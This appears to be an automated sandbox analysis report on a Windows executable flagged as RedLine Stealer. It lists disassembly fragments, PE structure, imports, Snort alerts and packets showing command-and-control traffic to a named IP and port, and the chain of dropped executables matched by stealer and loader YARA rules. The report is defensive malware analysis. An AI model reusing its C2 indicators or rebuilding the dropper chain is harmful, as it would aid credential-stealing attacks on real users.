                                                                                                                                                                                                                                  je 00007F48586C6B68h
                                                                                                                                                                                                                                  mov dword ptr [esi+04h], ebx
                                                                                                                                                                                                                                  test al, 10h
                                                                                                                                                                                                                                  je 00007F48586C6BDDh
                                                                                                                                                                                                                                  mov ecx, dword ptr [esi+08h]
                                                                                                                                                                                                                                  and eax, FFFFFFFEh
                                                                                                                                                                                                                                  mov dword ptr [esi], ecx
                                                                                                                                                                                                                                  mov dword ptr [esi+0Ch], eax
                                                                                                                                                                                                                                  mov eax, dword ptr [esi+0Ch]
                                                                                                                                                                                                                                  and eax, FFFFFFEFh
                                                                                                                                                                                                                                  or eax, 02h
                                                                                                                                                                                                                                  mov dword ptr [esi+0Ch], eax
                                                                                                                                                                                                                                  mov dword ptr [esi+04h], ebx
                                                                                                                                                                                                                                  mov dword ptr [ebp-04h], ebx
                                                                                                                                                                                                                                  test eax, 0000010Ch
                                                                                                                                                                                                                                  jne 00007F48586C6B7Eh
                                                                                                                                                                                                                                  call 00007F48586C7DDEh
                                                                                                                                                                                                                                  add eax, 20h
                                                                                                                                                                                                                                  cmp esi, eax
                                                                                                                                                                                                                                  je 00007F48586C6B5Eh
                                                                                                                                                                                                                                  call 00007F48586C7DD2h
                                                                                                                                                                                                                                  add eax, 40h
                                                                                                                                                                                                                                  cmp esi, eax
                                                                                                                                                                                                                                  jne 00007F48586C6B5Fh
                                                                                                                                                                                                                                  push dword ptr [ebp+0Ch]
                                                                                                                                                                                                                                  call 00007F48586CB181h
                                                                                                                                                                                                                                  pop ecx
                                                                                                                                                                                                                                  test eax, eax
                                                                                                                                                                                                                                  jne 00007F48586C6B59h
                                                                                                                                                                                                                                  push esi
                                                                                                                                                                                                                                  call 00007F48586CB12Dh
                                                                                                                                                                                                                                  pop ecx
                                                                                                                                                                                                                                  test dword ptr [esi+0Ch], 00000108h
                                                                                                                                                                                                                                  push edi
                                                                                                                                                                                                                                  je 00007F48586C6BD6h
                                                                                                                                                                                                                                  mov eax, dword ptr [esi+08h]
                                                                                                                                                                                                                                  mov edi, dword ptr [esi]
                                                                                                                                                                                                                                  lea ecx, dword ptr [eax+01h]
                                                                                                                                                                                                                                  mov dword ptr [esi], ecx

                                                                                                                                                                                                                                  Rich Headers

                                                                                                                                                                                                                                  Programming Language:
                                                                                                                                                                                                                                  • [C++] VS2008 build 21022
                                                                                                                                                                                                                                  • [ASM] VS2008 build 21022
                                                                                                                                                                                                                                  • [ C ] VS2008 build 21022
                                                                                                                                                                                                                                  • [IMP] VS2005 build 50727
                                                                                                                                                                                                                                  • [RES] VS2008 build 21022
                                                                                                                                                                                                                                  • [LNK] VS2008 build 21022

                                                                                                                                                                                                                                  Data Directories

                                                                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x106f400x64.text
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x27b80000x1a612.rsrc
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x27d30000xaa0.reloc
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x11f00x1c.text
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2d780x40.text
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x10000x1ac.text
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                  Sections

                                                                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                  .text0x10000x1069060x106a00False0.9755557249524036data7.985286241021559IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                  .data0x1080000x26af5480x2600unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                  .rsrc0x27b80000x1a6120x1a800False0.38375221108490565data4.307961956559254IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                  .reloc0x27d30000x81780x8200False0.0734375data0.9144732522290139IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                  Resources

                                                                                                                                                                                                                                  NameRVASizeTypeLanguageCountry
                                                                                                                                                                                                                                  RT_ICON0x27b88b00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SpanishMexico
                                                                                                                                                                                                                                  RT_ICON0x27b97580x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SpanishMexico
                                                                                                                                                                                                                                  RT_ICON0x27ba0000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SpanishMexico
                                                                                                                                                                                                                                  RT_ICON0x27bc5a80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SpanishMexico
                                                                                                                                                                                                                                  RT_ICON0x27bd6500x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SpanishMexico
                                                                                                                                                                                                                                  RT_ICON0x27bdab80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsSpanishMexico
                                                                                                                                                                                                                                  RT_ICON0x27be9600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsSpanishMexico
                                                                                                                                                                                                                                  RT_ICON0x27bf2080x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsSpanishMexico
                                                                                                                                                                                                                                  RT_ICON0x27bf8d00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsSpanishMexico
                                                                                                                                                                                                                                  RT_ICON0x27bfe380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216SpanishMexico
                                                                                                                                                                                                                                  RT_ICON0x27c23e00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096SpanishMexico
                                                                                                                                                                                                                                  RT_ICON0x27c34880x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304SpanishMexico
                                                                                                                                                                                                                                  RT_ICON0x27c3e100x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024SpanishMexico
                                                                                                                                                                                                                                  RT_ICON0x27c42780xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SpanishMexico
                                                                                                                                                                                                                                  RT_ICON0x27c51200x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SpanishMexico
                                                                                                                                                                                                                                  RT_ICON0x27c59c80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SpanishMexico
                                                                                                                                                                                                                                  RT_ICON0x27c5f300x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SpanishMexico
                                                                                                                                                                                                                                  RT_ICON0x27c84d80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SpanishMexico
                                                                                                                                                                                                                                  RT_ICON0x27c95800x988Device independent bitmap graphic, 24 x 48 x 32, image size 0SpanishMexico
                                                                                                                                                                                                                                  RT_ICON0x27c9f080x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SpanishMexico
                                                                                                                                                                                                                                  RT_ICON0x27ca3700xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SpanishMexico
                                                                                                                                                                                                                                  RT_ICON0x27cb2180x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SpanishMexico
                                                                                                                                                                                                                                  RT_ICON0x27cbac00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0SpanishMexico
                                                                                                                                                                                                                                  RT_ICON0x27cc1880x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SpanishMexico
                                                                                                                                                                                                                                  RT_ICON0x27cc6f00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SpanishMexico
                                                                                                                                                                                                                                  RT_ICON0x27cec980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SpanishMexico
                                                                                                                                                                                                                                  RT_ICON0x27cfd400x988Device independent bitmap graphic, 24 x 48 x 32, image size 0SpanishMexico
                                                                                                                                                                                                                                  RT_ICON0x27d06c80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SpanishMexico
                                                                                                                                                                                                                                  RT_DIALOG0x27d0b300x86data
                                                                                                                                                                                                                                  RT_STRING0x27d0bb80x490data
                                                                                                                                                                                                                                  RT_STRING0x27d10480x3d6data
                                                                                                                                                                                                                                  RT_STRING0x27d14200x492data
                                                                                                                                                                                                                                  RT_STRING0x27d18b40x382data
                                                                                                                                                                                                                                  RT_ACCELERATOR0x27d1c380x48dataSpanishMexico
                                                                                                                                                                                                                                  RT_ACCELERATOR0x27d1c800x18dataSpanishMexico
                                                                                                                                                                                                                                  RT_GROUP_ICON0x27d1c980x68dataSpanishMexico
                                                                                                                                                                                                                                  RT_GROUP_ICON0x27d1d000x4cdataSpanishMexico
                                                                                                                                                                                                                                  RT_GROUP_ICON0x27d1d4c0x76dataSpanishMexico
                                                                                                                                                                                                                                  RT_GROUP_ICON0x27d1dc40x76dataSpanishMexico
                                                                                                                                                                                                                                  RT_VERSION0x27d1e3c0x1e0data
                                                                                                                                                                                                                                  RT_MANIFEST0x27d201c0x5ebXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                  None0x27d26080xadata

                                                                                                                                                                                                                                  Imports

                                                                                                                                                                                                                                  DLLImport
                                                                                                                                                                                                                                  KERNEL32.dllGetLogicalDriveStringsW, SetDefaultCommConfigW, CreateHardLinkA, GetConsoleAliasesA, LoadLibraryW, _hread, IsBadCodePtr, CreateEventA, FormatMessageW, GetFileAttributesA, GetExitCodeProcess, SetConsoleMode, WriteConsoleW, WritePrivateProfileSectionW, ChangeTimerQueueTimer, SetLastError, GetProcAddress, GlobalAddAtomA, EnumSystemCodePagesW, LocalAlloc, FoldStringA, FreeEnvironmentStringsW, VirtualProtect, GetWindowsDirectoryW, GetFileInformationByHandle, GlobalReAlloc, InterlockedPushEntrySList, LCMapStringW, CloseHandle, CreateFileA, HeapSize, lstrcpynA, CallNamedPipeA, VirtualAlloc, GetVolumeNameForVolumeMountPointA, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, GetLastError, HeapFree, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, DeleteCriticalSection, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetModuleFileNameA, GetModuleFileNameW, GetEnvironmentStringsW, GetCommandLineW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, InterlockedDecrement, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapReAlloc, InitializeCriticalSectionAndSpinCount, RtlUnwind, MultiByteToWideChar, LoadLibraryA, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, LCMapStringA, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, FlushFileBuffers, RaiseException
                                                                                                                                                                                                                                  USER32.dllClientToScreen, LoadMenuA, InvalidateRgn, GetMenuInfo, MessageBoxIndirectW, CountClipboardFormats, SetScrollInfo
                                                                                                                                                                                                                                  GDI32.dllGetGlyphIndicesW
                                                                                                                                                                                                                                  ADVAPI32.dllRegOpenKeyA

                                                                                                                                                                                                                                  Possible Origin

                                                                                                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                  SpanishMexico

                                                                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                                                                  Snort IDS Alerts

                                                                                                                                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                  192.168.2.3193.233.20.304970141252043231 03/18/23-20:58:24.653479TCP2043231ET TROJAN Redline Stealer TCP CnC Activity497014125192.168.2.3193.233.20.30
                                                                                                                                                                                                                                  192.168.2.3193.233.20.304970141252043233 03/18/23-20:58:07.054155TCP2043233ET TROJAN RedLine Stealer TCP CnC net.tcp Init497014125192.168.2.3193.233.20.30
                                                                                                                                                                                                                                  193.233.20.30192.168.2.34125497012043234 03/18/23-20:58:08.632497TCP2043234ET MALWARE Redline Stealer TCP CnC - Id1Response412549701193.233.20.30192.168.2.3

                                                                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:06.663388014 CET497014125192.168.2.3193.233.20.30
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:06.686135054 CET412549701193.233.20.30192.168.2.3
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:06.686362982 CET497014125192.168.2.3193.233.20.30
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:07.054155111 CET497014125192.168.2.3193.233.20.30
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:07.077070951 CET412549701193.233.20.30192.168.2.3
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:07.122698069 CET497014125192.168.2.3193.233.20.30
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:08.609289885 CET497014125192.168.2.3193.233.20.30
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:08.632497072 CET412549701193.233.20.30192.168.2.3
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:08.685370922 CET497014125192.168.2.3193.233.20.30
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:19.614017010 CET497014125192.168.2.3193.233.20.30
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:19.638431072 CET412549701193.233.20.30192.168.2.3
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:19.638463974 CET412549701193.233.20.30192.168.2.3
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:19.638484955 CET412549701193.233.20.30192.168.2.3
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:19.638664961 CET497014125192.168.2.3193.233.20.30
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:19.638720989 CET497014125192.168.2.3193.233.20.30
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:20.938442945 CET497014125192.168.2.3193.233.20.30
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:20.962827921 CET412549701193.233.20.30192.168.2.3
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:21.014508009 CET497014125192.168.2.3193.233.20.30
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:21.380616903 CET497014125192.168.2.3193.233.20.30
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:21.403899908 CET412549701193.233.20.30192.168.2.3
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:21.457176924 CET497014125192.168.2.3193.233.20.30
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:21.541018009 CET497014125192.168.2.3193.233.20.30
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:21.563800097 CET412549701193.233.20.30192.168.2.3
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:21.564196110 CET412549701193.233.20.30192.168.2.3
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:21.608309031 CET497014125192.168.2.3193.233.20.30
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:21.731764078 CET497014125192.168.2.3193.233.20.30
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:21.755337954 CET412549701193.233.20.30192.168.2.3
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:21.763166904 CET497014125192.168.2.3193.233.20.30
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:21.788644075 CET412549701193.233.20.30192.168.2.3
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:21.794116974 CET497014125192.168.2.3193.233.20.30
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:21.817415953 CET412549701193.233.20.30192.168.2.3
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:21.821443081 CET497014125192.168.2.3193.233.20.30
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:21.846554041 CET412549701193.233.20.30192.168.2.3
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:21.889859915 CET497014125192.168.2.3193.233.20.30
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:22.177835941 CET497014125192.168.2.3193.233.20.30
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:22.208134890 CET412549701193.233.20.30192.168.2.3
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:22.208218098 CET412549701193.233.20.30192.168.2.3
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:22.208268881 CET412549701193.233.20.30192.168.2.3
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:22.248943090 CET497014125192.168.2.3193.233.20.30
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:22.619117022 CET497014125192.168.2.3193.233.20.30
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:22.649648905 CET412549701193.233.20.30192.168.2.3
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:22.665638924 CET497014125192.168.2.3193.233.20.30
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:22.689857006 CET412549701193.233.20.30192.168.2.3
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:22.733931065 CET497014125192.168.2.3193.233.20.30
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:23.998817921 CET497014125192.168.2.3193.233.20.30
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:24.021681070 CET412549701193.233.20.30192.168.2.3
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:24.022135973 CET412549701193.233.20.30192.168.2.3
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:24.171370029 CET497014125192.168.2.3193.233.20.30
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:24.356787920 CET497014125192.168.2.3193.233.20.30
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:24.380835056 CET412549701193.233.20.30192.168.2.3
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:24.443901062 CET497014125192.168.2.3193.233.20.30
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:24.468919039 CET412549701193.233.20.30192.168.2.3
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:24.468954086 CET412549701193.233.20.30192.168.2.3
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:24.468971014 CET412549701193.233.20.30192.168.2.3
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:24.469019890 CET412549701193.233.20.30192.168.2.3
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:24.500091076 CET497014125192.168.2.3193.233.20.30
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:24.524600983 CET412549701193.233.20.30192.168.2.3
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:24.569483995 CET497014125192.168.2.3193.233.20.30
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:24.594418049 CET412549701193.233.20.30192.168.2.3
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:24.604362011 CET497014125192.168.2.3193.233.20.30
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:24.627705097 CET412549701193.233.20.30192.168.2.3
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:24.629317045 CET497014125192.168.2.3193.233.20.30
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:24.652537107 CET412549701193.233.20.30192.168.2.3
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:24.653479099 CET497014125192.168.2.3193.233.20.30
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:24.680087090 CET412549701193.233.20.30192.168.2.3
                                                                                                                                                                                                                                  Mar 18, 2023 20:58:24.712532997 CET497014125192.168.2.3193.233.20.30

                                                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                                  Behavior

                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                  Start time:20:58:10
                                                                                                                                                                                                                                  Start date:18/03/2023
                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\szDGo5lHdI.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:C:\Users\user\Desktop\szDGo5lHdI.exe
                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                  File size:1228288 bytes
                                                                                                                                                                                                                                  MD5 hash:D20BA0CEFF50B0A05C84F694E28462AA
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.447521600.0000000006902000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.260695646.0000000006E55000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.447701625.0000000006A00000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                  Reputation:low

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                                                                  Start time:20:58:11
                                                                                                                                                                                                                                  Start date:18/03/2023
                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe
                                                                                                                                                                                                                                  Imagebase:0x10b0000
                                                                                                                                                                                                                                  File size:858624 bytes
                                                                                                                                                                                                                                  MD5 hash:566C1099548DF136503F4DC814D54B17
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000003.261924931.0000000004C7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                  Reputation:low

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                                                  Start time:20:58:12
                                                                                                                                                                                                                                  Start date:18/03/2023
                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe
                                                                                                                                                                                                                                  Imagebase:0x960000
                                                                                                                                                                                                                                  File size:713216 bytes
                                                                                                                                                                                                                                  MD5 hash:EBD95183957BECDB18025FC9D553B15E
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                  Reputation:low

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                                                  Start time:20:58:13
                                                                                                                                                                                                                                  Start date:18/03/2023
                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe
                                                                                                                                                                                                                                  Imagebase:0x190000
                                                                                                                                                                                                                                  File size:353280 bytes
                                                                                                                                                                                                                                  MD5 hash:54A8FD200F50B6AF0F10CA6EB68471D3
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                  Reputation:low

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                                                  Start time:20:58:13
                                                                                                                                                                                                                                  Start date:18/03/2023
                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe
                                                                                                                                                                                                                                  Imagebase:0x4d0000
                                                                                                                                                                                                                                  File size:11264 bytes
                                                                                                                                                                                                                                  MD5 hash:7E93BACBBC33E6652E147E7FE07572A0
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                                                                  Start time:20:58:25
                                                                                                                                                                                                                                  Start date:18/03/2023
                                                                                                                                                                                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                  Imagebase:0x7ff6922f0000
                                                                                                                                                                                                                                  File size:69632 bytes
                                                                                                                                                                                                                                  MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                                                                  Start time:20:58:30
                                                                                                                                                                                                                                  Start date:18/03/2023
                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe
                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                  File size:341504 bytes
                                                                                                                                                                                                                                  MD5 hash:0B63FCA2981CA840B845011956E212AD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000D.00000002.328271047.0000000002DE6000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
